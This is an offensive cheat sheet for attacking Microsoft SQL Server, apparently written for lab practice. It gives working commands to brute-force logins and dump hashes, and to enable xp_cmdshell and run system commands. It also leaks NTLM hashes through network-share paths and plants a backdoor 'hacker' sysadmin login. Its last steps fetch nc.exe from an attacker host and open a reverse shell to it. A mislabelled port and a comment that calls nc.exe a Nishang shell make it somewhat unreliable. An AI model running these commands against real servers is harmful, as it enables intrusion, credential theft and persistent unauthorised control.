1443 - MsSQL
Microsoft SQL Server
Nmap Scripts
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.10.10.3
Connecting to MsSQL from Windows
sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30
Connecting to MsSQL from Linux
Remember! after command type 'go'
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h
sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h
# Windows Authentication mechanism is used by the MSSQL server
MsSQL Commands
| Command | Description |
|---|---|
SELECT @@VERSION; |
Show DB version. |
SELECT USER_NAME(); |
Show current user. |
SELECT name FROM master.dbo.sysdatabases; |
Show all available databases in MSSQL. |
USE htbusers; |
Select a specific database in MSSQL (htbusers). |
SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES; |
Show all available tables in the selected database (htbusers). |
SELECT * FROM users; |
Select all entries from the users table in the current database. |
EXECUTE sp_configure 'show advanced options', 1; |
Allow advanced options to be changed. |
EXECUTE sp_configure 'xp_cmdshell', 1; |
Enable the xp_cmdshell extended stored procedure. |
RECONFIGURE; |
Apply configuration changes. |
xp_cmdshell 'whoami'; |
Execute a system command (whoami) on the MSSQL server. |
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents; |
Read content of a local file on the MSSQL server. |
EXEC master..xp_dirtree '\\\\10.10.110.17\\share\\'; |
Show directory/file structure of a network share (may leak NTLM hashes). |
EXEC master..xp_subdirs '\\\\10.10.110.17\\share\\'; |
Show subdirectories of a network share (also may leak hashes). |
SELECT srvname, isremote FROM sysservers; |
List linked servers and whether they are remote. |
EXECUTE('SELECT @@servername, @@version, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [10.0.0.12\\SQLEXPRESS]; |
Run query on linked server to get name, version, user, and role. |
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'; |
Create a new login. |
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'; |
Grant sysadmin privileges to the hacker login. |
BruteForce
nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt $ip
RCE with SQL Server
mssqlclient.py <domain>/<username>:<password>@$ip
mssqlclient.py bathry/admin:pss123@192.168.11.15
SQL> enable_xp_cmdshell
# Enable Code Execution
SQL> xp_cmdshell copy \\10.10.16.26\gabbar\nc.exe %temp%\nc.exe
# Copied the Nishang reverse shell to current directory
SQL> xp_cmdshell %temp%/nc.exe -e cmd.exe 10.10.16.26 4444
# Start